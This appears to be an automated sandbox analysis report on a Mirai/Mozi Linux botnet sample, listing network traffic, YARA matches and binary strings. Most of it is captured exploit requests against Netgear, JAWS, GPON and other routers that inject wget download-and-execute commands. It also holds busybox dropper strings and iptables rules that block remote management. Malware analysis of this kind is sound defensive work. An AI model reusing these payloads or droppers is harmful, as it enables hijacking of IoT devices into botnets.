                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 211.138.21.19:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 170.189.236.39:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 176.37.130.5:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 31.231.192.61:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 120.175.236.38:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 176.1.96.117:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 106.218.209.57:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 2.199.234.248:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 200.6.145.229:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 164.216.166.24:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficDNS traffic detected: DNS query: dht.transmissionbt.com
                            Source: global trafficDNS traffic detected: DNS query: router.bittorrent.com
                            Source: global trafficDNS traffic detected: DNS query: router.utorrent.com
                            Source: global trafficDNS traffic detected: DNS query: bttracker.debian.org
                            Source: unknownHTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 127.0.0.1:80Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, WorldContent-Length: 118Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
                            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: alphapdDate: Thu Nov 28 01:28:59 2024Pragma: no-cacheCache-Control: no-cacheContent-type: text/htmlContent-length: 62Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 66 6f 72 62 69 64 64 65 6e 2e 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: <html><body><h1>The request is forbidden.</h1></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 49Content-Type: text/html
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 28 Nov 2024 06:30:29 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                            Source: networks.34.drString found in binary or memory: http://%s:%d/Mozi.a;chmod
                            Source: bin.sh.elf, networks.34.drString found in binary or memory: http://%s:%d/Mozi.a;sh$
                            Source: networks.34.drString found in binary or memory: http://%s:%d/Mozi.m
                            Source: bin.sh.elf, networks.34.drString found in binary or memory: http://%s:%d/Mozi.m;
                            Source: bin.sh.elf, networks.34.drString found in binary or memory: http://%s:%d/Mozi.m;$
                            Source: bin.sh.elf, networks.34.drString found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
                            Source: networks.34.drString found in binary or memory: http://%s:%d/bin.sh
                            Source: bin.sh.elf, networks.34.drString found in binary or memory: http://%s:%d/bin.sh;chmod
                            Source: networks.34.drString found in binary or memory: http://127.0.0.1
                            Source: bin.sh.elf, networks.34.drString found in binary or memory: http://127.0.0.1sendcmd
                            Source: bin.sh.elf, networks.34.drString found in binary or memory: http://HTTP/1.1
                            Source: bin.sh.elf, networks.34.drString found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
                            Source: kmod.sh.34.drString found in binary or memory: http://git.kernel.org/cgit/utils/kernel/kmod/kmod.git/commit/libkmod/libkmod-module.c?id=fd44a98ae2e
                            Source: .config.34.drString found in binary or memory: http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
                            Source: networks.34.drString found in binary or memory: http://ipinfo.io/ip
                            Source: alsa-info.sh.34.drString found in binary or memory: http://pastebin.ca)
                            Source: alsa-info.sh.34.drString found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
                            Source: alsa-info.sh.34.drString found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
                            Source: bin.sh.elf, networks.34.drString found in binary or memory: http://purenetworks.com/HNAP1/
                            Source: networks.34.drString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                            Source: networks.34.drString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                            Source: bin.sh.elf, networks.34.drString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
                            Source: alsa-info.sh.34.drString found in binary or memory: http://www.alsa-project.org
                            Source: alsa-info.sh.34.drString found in binary or memory: http://www.alsa-project.org.
                            Source: alsa-info.sh.34.drString found in binary or memory: http://www.alsa-project.org/alsa-info.sh
                            Source: alsa-info.sh.34.drString found in binary or memory: http://www.alsa-project.org/cardinfo-db/
                            Source: alsa-info.sh.34.drString found in binary or memory: http://www.pastebin.ca
                            Source: alsa-info.sh.34.drString found in binary or memory: http://www.pastebin.ca.
                            Source: alsa-info.sh.34.drString found in binary or memory: http://www.pastebin.ca/upload.php
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
                            Source: /tmp/bin.sh.elf (PID: 6244)HTML file containing JavaScript created: /usr/networksJump to dropped file

                            System Summary

                            barindex
                            Source: bin.sh.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_5c62e6b2 Author: unknown
                            Source: bin.sh.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_77137320 Author: unknown
                            Source: bin.sh.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_ac253e4f Author: unknown
                            Source: 6242.1.00007fb730017000.00007fb730058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5c62e6b2 Author: unknown
                            Source: 6242.1.00007fb730017000.00007fb730058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_77137320 Author: unknown
                            Source: 6242.1.00007fb730017000.00007fb730058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_ac253e4f Author: unknown
                            Source: 6240.1.00007fb730017000.00007fb730058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5c62e6b2 Author: unknown
                            Source: 6240.1.00007fb730017000.00007fb730058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_77137320 Author: unknown
                            Source: 6240.1.00007fb730017000.00007fb730058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_ac253e4f Author: unknown
                            Source: /usr/networks, type: DROPPEDMatched rule: Linux_Trojan_Mirai_5c62e6b2 Author: unknown
                            Source: /usr/networks, type: DROPPEDMatched rule: Linux_Trojan_Mirai_77137320 Author: unknown
                            Source: /usr/networks, type: DROPPEDMatched rule: Linux_Trojan_Mirai_ac253e4f Author: unknown
                            Source: Initial sampleString containing 'busybox' found: busybox
                            Source: Initial sampleString containing 'busybox' found: ..%s/%s/proc/haha/tmp/var/lib/dev/syscfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"iptables -I INPUT -p tcp --destination-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 7547 -j DROPiptables -I OUTPUT -p tcp --source-port 7547 -j DROPiptables -I INPUT -p tcp --dport 35000 -j DROPiptables -I INPUT -p tcp --dport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 35000 -j DROPiptables -I INPUT -p tcp --dport 7547 -j DROPiptables -I OUTPUT -p tcp --sport 7547 -j DROP/mnt/jffs2/Equip.sh%s%s%s%s#!/bin/sh/mnt/jffs2/wifi.sh/mnt/jffs2/WifiPerformance.shbusybox%255s %255s %255s %255s
                            Source: Initial sampleString containing 'busybox' found: /bin/busybox cat /bin/ls|head -n 1
                            Source: Initial sampleString containing 'busybox' found: /bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls
                            Source: Initial sampleString containing 'busybox' found: /bin/busybox cat /bin/ls|more
                            Source: Initial sampleString containing 'busybox' found: "\x%02xsage:/bin/busybox cat /bin/ls|head -n 1
                            Source: Initial sampleString containing 'busybox' found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
                            Source: Initial sampleString containing 'busybox' found: /bin/busybox dd bs=52 count=1 if=/bin/ls || /bin/busybox cat /bin/ls || while read i; do printf $i; done < /bin/ls || while read i; do printf $i; done < /bin/busybox
                            Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)
                            Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
                            Source: Initial sampleString containing 'busybox' found: /bin/busybox echo '%s' %s .i; %s && /bin/busybox echo '%s'
                            Source: Initial sampleString containing 'busybox' found: ./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
                            Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
                            Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
                            Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '%s'
                            Source: Initial sampleString containing 'busybox' found: /bin/busybox wget;/bin/busybox echo -ne '%s'
                            Source: Initial sampleString containing 'busybox' found: ELF.r.c.x.k.p.s.6.m.l.4>>/bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)>.x/bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
